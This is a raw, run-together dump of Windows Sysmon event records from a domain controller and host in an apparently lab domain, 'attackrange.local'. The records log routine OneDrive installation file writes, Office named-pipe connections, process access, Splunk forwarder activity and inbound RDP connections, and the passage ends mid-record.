14:58:10.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.404{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:58:10.326 11241100x800000000000000078632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:58:10.404{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe2021-04-20 14:58:10.342 11241100x800000000000000078631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.310{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:58:10.264 11241100x800000000000000078630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.279{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ETWlog.dll2021-04-20 14:58:10.264 18141800x800000000000000078629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.264{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:10.248{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC01-607E-340E-00000000BB01}6180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:10.139{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC01-607E-340E-00000000BB01}6180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000078618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:10.217{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\qtquickcontrols2plugin.dll2021-04-20 14:58:10.092 18141800x800000000000000078617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.123{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:10.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.967{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:58:09.888 18141800x800000000000000078614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:09.904{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:09.810{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-libraryloader-l1-1-0.dll2021-04-20 14:58:09.810 23542300x800000000000000050494Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:10.462{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDE27054ADA492090E74C54E1C72A764,SHA256=81351B188523184A0D9FA5D066DF3463C5868599D3DA2BDA4D36D2CD2CDABFF3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:11.748{A7A01FEF-B626-607E-1300-00000000BB01}12642404C:\Windows\System32\svchost.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+2b221|c:\windows\system32\pcasvc.dll+f70d|c:\windows\system32\pcasvc.dll+20e94|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000078743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.717{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\libGLESv2.dll2021-04-20 14:58:11.717 11241100x800000000000000078742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.701{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncClient.dll2021-04-20 14:58:11.701 11241100x800000000000000078741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.560{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\libEGL.dll2021-04-20 14:58:11.545 18141800x800000000000000078740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.545{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.545{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncApi.dll2021-04-20 14:58:11.545 11241100x800000000000000078737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.529{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\Qt5QuickControls2.dll2021-04-20 14:58:11.529 18141800x800000000000000078736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.498{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:11.482{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E79442B00D0BEEB961543B445D12E9C2,SHA256=AF268C0357F018C0BB1CECE245930DD1FDD2B60BBF8F8AC12298A870CB983AA2,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.404{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.404{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSync.Resources.dll2021-04-20 14:58:11.404 18141800x800000000000000078728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.357{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.342{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSync.LocalizedResources.dll2021-04-20 14:58:11.342 11241100x800000000000000078726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.342{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-utility-l1-1-0.dll2021-04-20 14:58:11.342 18141800x800000000000000078725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.295{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.248{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.092{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.060{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-string-l1-1-0.dll2021-04-20 14:58:11.060 18141800x800000000000000078703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.045{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-rtlsupport-l1-1-0.dll2021-04-20 14:58:11.045 18141800x800000000000000078701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.029{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-time-l1-1-0.dll2021-04-20 14:58:11.029 18141800x800000000000000078699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.029{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-profile-l1-1-0.dll2021-04-20 14:58:11.029 18141800x800000000000000078697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.013{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:58:11.013 18141800x800000000000000078693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:11.013{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:11.013{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:58:10.982 354300x800000000000000078691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:09.769{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-6315-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000078690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:09.563{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-9040-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000078689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.680{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT 